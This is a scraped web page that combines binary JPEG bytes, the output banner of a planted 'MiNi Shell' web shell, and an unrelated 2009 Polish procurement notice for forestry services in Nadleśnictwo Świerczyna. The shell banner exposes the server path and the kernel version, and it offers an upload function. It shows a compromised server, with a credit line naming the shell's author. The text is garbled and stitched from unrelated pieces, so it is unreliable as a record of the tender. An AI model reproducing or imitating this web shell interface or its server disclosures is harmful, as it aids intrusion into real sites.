JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/6147-N-2009.html

<p class="kh_header"><b>Świerczyna: Usługi z zakresu gospodarki lesnej w Nadleśnictwie Świerczyna w okresie od 19 stycznia 2009 roku do 31 grudnia 2009 roku.</b><br>
<b>Numer ogłoszenia: 6147 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Świerczyna , Świerczyna 1A, 78-531 Świerczyna, woj. zachodniopomorskie, tel. 094 3618622, faks 094 3618649.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gospodarka leśna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi z zakresu gospodarki lesnej w Nadleśnictwie Świerczyna w okresie od 19 stycznia 2009 roku do 31 grudnia 2009 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Do 133 tys. EURO.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.23.10.00-8, 77.10.00.00-1, 77.21.11.00-3, 77.21.14.00-6, 77.21.15.00-7, 77.21.16.00-8, 90.62.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 19.01.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Część  1/2009  - 1.737,00 PLN
	Część  2/2009  -    692,00 PLN
	Część  3/2009  - 1.863,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy, którzy:
1.Są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami
ustawowymi (dotyczy części zamówienia nr 1-3)
2.Przedsiębiorcy składający  ofertę wspólną przedstawią do oferty umowę o solidarnej odpowiedzialności oraz o wyznaczeniu spośród siebie strony wiodącej tj. Lidera, który będzie reprezentował zawiązane konsorcjum przed Zamawiającym (dotyczy części zamówienia nr 1-3
3.Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (dotyczy części zamówienia nr 1-3)
4.Posiadają niezbędną wiedzę i doświadczenie do wykonania zamówienia, a w tym względzie : 
a)wykaz usług wykonanych przez Wykonawcę w okresie ostatnich 3 lat (2006-2008) zał. nr 6 do SIWZ  polegających na jednoczesnym wykonywaniu usług z zakresu zagospodarowania lasu, zrywki i pozyskania drewna ( dot. części zamówienia nr 1), na kwotę nie mniejszą niż 300.000,00 zł łącznie, część zamówienia  2 i 3 - 150.000,00 zł łącznie. ( a jeżeli okres wykonywania działalności gospodarczej jest krótszy- w tym okresie).
Dokumenty potwierdzające przedstawiony przerób (faktury, protokoły odbioru robót). 
5.Dysponują osobami zdolnymi do wykonania zamówienia, a w tym względzie:
a)wykażą przeciętne zatrudnienie pracowników i kadry kierowniczej w okresie 3 lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, ( część zamówienia nr 1 i 3)
b)przedstawią oświadczenia  minimum 3 drwali - operatorów pilarki spalinowej na jedną część zamówienia, ( część zamówienia nr 1), którzy będą zatrudnieni w celu realizacji zamówienia.
6.Wykonawcy wykażą posiadanie  niezbędnego potencjału technicznego  adekwatnego  do wykonania zamówienia , minimum:
a)pilarki spalinowe - 3 szt na jedną część zamówienia (część zamówienia nr 1)
b)wykaszarki spalinowe - 2 szt na jedną część zamówienia  ( część zamówienia nr 1)
c)specjalistyczny ciągnik zrywkowy do  nasiębiernej lub podwieszanej zrywki drewna  część zamówienia nr 1)
d)urządzenia do przygotowania gleby takie jak : pług LPŻ + spulchniacz lub równoważne, pług rolniczy i brona  - po 1 szt. ( dotyczy części zamówienia nr 3)
e)urządzenie do rozdrabniania pozostałości zrębowych - 1 szt. ( dotyczy części zamówienia nr 3) 
7.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (art. 24 ust.1i 2 ustawy).
8.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia w ustalonym terminie , a w tym względzie :
a)posiadają własne lub udokumentują dostęp ( informacja z banku o stanie posiadanych środków lub dostępności kredytu  z podaniem kwoty kredytu) do środków finansowych zapewniających ciągłość usług, przynajmniej na jeden  miesiąc, 
b)kwota posiadanych lub dostępnych środków nie może być mniejsza niż 1/12 ceny ofertowej,
c)środki na zabezpieczenie finansowania  muszą być wolne od zobowiązań z  tytułu innych realizowanych zamówień,
d)posiadają ubezpieczenie działalności gospodarczej od odpowiedzialności cywilnej na okres minimum 1 miesiąca od daty składania ofert i zobowiązują się do odnawiania polisy ubezpieczeniowej przez cały okres realizacji usług. 
9.Wykonawca spełnia warunki udziału w postępowaniu zgodnie z art.22 ustawy Pzp.
10.Nie zalega z płatnościami wobec Urzędu Skarbowego .
11.Nie zalega z płatnościami wobec ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego.
12.Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w dziale  IX  niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.formularze cenowe  oferty wg załączonego wzoru - zał. nr 2
2.pełnomocnictwo podmiotów występujących wspólnie (konsorcjum),
3.aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, (wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert),
Dodatkowo :
1) - spółki cywilne i spółki jawne - umowa spółki,
2) - spółki z ograniczona odpowiedzialnością - uchwała wspólników - dotycząca zadania objętego zamówieniem - uprawniająca zaciąganie zobowiązania do świadczenia o wartości dwukrotnie przewyższającej wysokość kapitału zakładowego lub umowa spółki, kiedy złożenie takiej uchwały jest zbędne ( art. 230 Ksh )
3) - umowa regulująca współpracę podmiotów występujących wspólnie ( np. konsorcja - umowa o konsorcjum na zadanie objęte zamówieniem ) zawierająca 
-zapis o solidarnej odpowiedzialności, 
-czas trwania umowy,
-podmiot wiodący - lidera,
-nazwę Zamawiającego,
-przedmiot zamówienia
4.oświadczenie, że wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 ustawy (zał. Nr 7 )
5.aktualną informacje z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 1 oraz  4 -8 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert), dotycząca:
a. osób fizycznych ( współwłaścicieli spółek, właścicieli firm ),
b.urzędujących członków władz osób prawnych.
6.aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt. 9 ustawy (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert);
7.aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert);
8.aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert); 
9.oświadczenie o  przeciętnym  zatrudnieniu pracowników i personelu kierowniczego w okresie 3 lat  - wg. zał. Nr 3
10.wykaz osób i podmiotów, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich uprawnień i kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności -   wg zał. nr 4 ,
Do wykazu należy dołączyć oświadczenia osób i podmiotów ujętych w wykazie potwierdzających, że będą świadczyły usługi na rzecz Wykonawcy składającego ofertę,
11.dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
12.wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakie posiada  wykonawca - wg zał. nr 5. Wymaga się aby posiadanie potwierdzone było dokumentami zakupu, dzierżawy , leasingu w/w  sprzętu lub oświadczenie osób i podmiotów ujętych w wykazie potwierdzających, że będą świadczyły usługi na rzecz Wykonawcy składającego ofertę,
13.wykaz części zamówienia, które Wykonawca zamierza powierzyć podwykonawcom (wg. wzoru- zał. Nr 13 do SIWZ).
14.informacja z Banku prowadzącego rachunek podstawowy wykonawcy zawierająca dane o stanie środków własnych lub dostępność kredytu - z podaniem wysokości kredytu (tj. zdolności kredytowej Wykonawcy) wskazująca na możliwość wykonania zadania . Informacja musi być wydana w okresie 6 miesięcy przed upływem terminu składania ofert.
15.polisa ubezpieczeniowa  OC  Wykonawcy w zakresie prowadzenia działalności gospodarczej  wraz z oświadczeniem dołączonym do oferty o kontynuacji ubezpieczenia po podpisaniu umowy.
16.wykaz wykonanych usług (zał. nr 6) o podobnym charakterze wykonanych w okresie 2006-2008 udokumentowanych fakturami lub protokółami odbioru robót,
17.Dokument potwierdzający dokonanie wpłaty wadium..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rdlp.szczecinek.pl/swierczyna/przetargi.php?id=55.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Świerczyna 1A, 78-531 Świerczyna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2009 godzina 08:00, miejsce: Nadleśnictwo Świerczyna - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Prace w leśnictwie Buczyna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prace z zakresu gospodarki leśnej obejmujące hodowlę, zrywkę drewna, pozyskanie drewna, zagospodarowanie lasu. Wielkość zamówienia do 133 tys. EURO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.23.10.00-8, 77.21.11.00-3, 77.21.14.00-6, 77.21.15.00-7, 77.23.10.00-8, 77.23.16.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grodzenie upraw leśnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Grodzenie upraw leśnych siatką grodzeniową AS 200/17/15 w leśnictwach. Wielkość zamówienia do 133 tys. EURO.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.23.10.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Prace mechaniczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przygotowanie gleby, rozdrabnianie pozostałości zrębowych, mineralizacja pasów ppoż., odśnieżanie dróg leśnych..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 77.23.10.00-8, 90.62.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com